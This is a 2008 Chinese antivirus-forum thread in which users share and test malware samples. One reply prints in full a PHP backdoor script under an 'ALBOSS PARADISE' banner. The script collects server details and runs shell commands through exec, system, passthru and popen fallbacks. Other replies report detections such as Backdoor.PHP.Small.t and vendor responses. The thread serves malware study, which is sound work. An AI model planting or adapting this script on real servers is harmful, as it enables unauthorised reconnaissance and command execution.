楼主: woai_jolin
收起左侧

[病毒样本] 3个txt

[复制链接]
qigang
发表于 2008-8-10 10:13:01 | 显示全部楼层
<?

echo "31337<br>";

$alb = @php_uname();

$alb2 = system(uptime);

$alb3 = system(id);

$alb4 = @getcwd();

$alb5 = getenv("SERVER_SOFTWARE");

$alb6 = phpversion();

$alb7 = $_SERVER['SERVER_NAME'];

$alb8 = $_SERVER['SERVER_ADDR'];

$os = @PHP_OS;

echo "UNITED ALBANIANS aka ALBOSS PARADISE<br>";

echo "os: $os<br>";

echo "uname -a: $alb<br>";

echo "uptime: $alb2<br>";

echo "id: $alb3<br>";

echo "pwd: $alb4<br>";

echo "SoftWare: $alb5<br>";

echo "PHPV: $alb6<br>";

echo "ServerName: $alb7<br>";

echo "ServerAddr: $alb8<br>";

$free = disk_free_space($alb4);

if ($free === FALSE) {$free = 0;}

if ($free < 0) {$free = 0;}

echo "Free: ".view_size($free)."<br>";

$cmd="id";

$eseguicmd=ex($cmd);

echo $eseguicmd;

function ex($cfe){

$res = '';

if (!empty($cfe)){

if(function_exists('exec')){

@exec($cfe,$res);

$res = join("\n",$res);

}

elseif(function_exists('shell_exec')){

$res = @shell_exec($cfe);

}

elseif(function_exists('system')){

@ob_start();

@system($cfe);

$res = @ob_get_contents();

@ob_end_clean();

}

elseif(function_exists('passthru')){

@ob_start();

@passthru($cfe);

$res = @ob_get_contents();

@ob_end_clean();

}

elseif(@is_resource($f = @popen($cfe,"r"))){

$res = "";

while(!@feof($f)) { $res .= @fread($f,1024); }

@pclose($f);

}}

return $res;

}

function view_size($size)

{

if (!is_numeric($size)) {return FALSE;}

else

{

  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}

  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}

  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}

  else {$size = $size . " B";}

  return $size;

}

}

exit;

?>
慢飞
发表于 2008-8-10 10:17:00 | 显示全部楼层
avast不让下载
尤金卡巴斯基
发表于 2008-8-10 14:10:36 | 显示全部楼层
2008/8/10 14:02:08        已清除        木马程序 Backdoor.PHP.Small.t        G:\Temp\Virus\txt.rar/2.txt
sam.to
发表于 2008-8-10 16:06:44 | 显示全部楼层
已刪除: 特洛伊木馬程式 Backdoor.PHP.Small.t        檔案: C:\Documents and Settings\kato9096\桌面\txt.rar/2.txt

上报2个到卡巴
sam.to
发表于 2008-8-10 17:59:36 | 显示全部楼层
Hello.
No malicious software was found in the attached file.
-----------------
Regards,  Namestnikov Yury
Virus Analyst, Kaspersky Lab.

Ph.: +7(095) 797-8700
E-mail: newvirus@kaspersky.com
http://www.kaspersky.com   http://www.viruslist.com
falconbaby
头像被屏蔽
发表于 2008-8-10 21:01:33 | 显示全部楼层
瑞星飘过
啊弥陀佛
发表于 2008-8-11 10:59:48 | 显示全部楼层
3个txt
BING126
头像被屏蔽
发表于 2008-8-11 21:32:50 | 显示全部楼层
McAfee  miss
卡饭论坛
头像被屏蔽
发表于 2008-8-13 10:44:46 | 显示全部楼层
瑞星全过
sam.to
发表于 2008-8-13 11:30:51 | 显示全部楼层
原帖由 328397663 于 2008-8-11 02:20 发表
无法识别的..已上传卡巴分析

都说了No malicious software,你还上报有什么意思?
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-7-14 14:06 , Processed in 0.083147 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表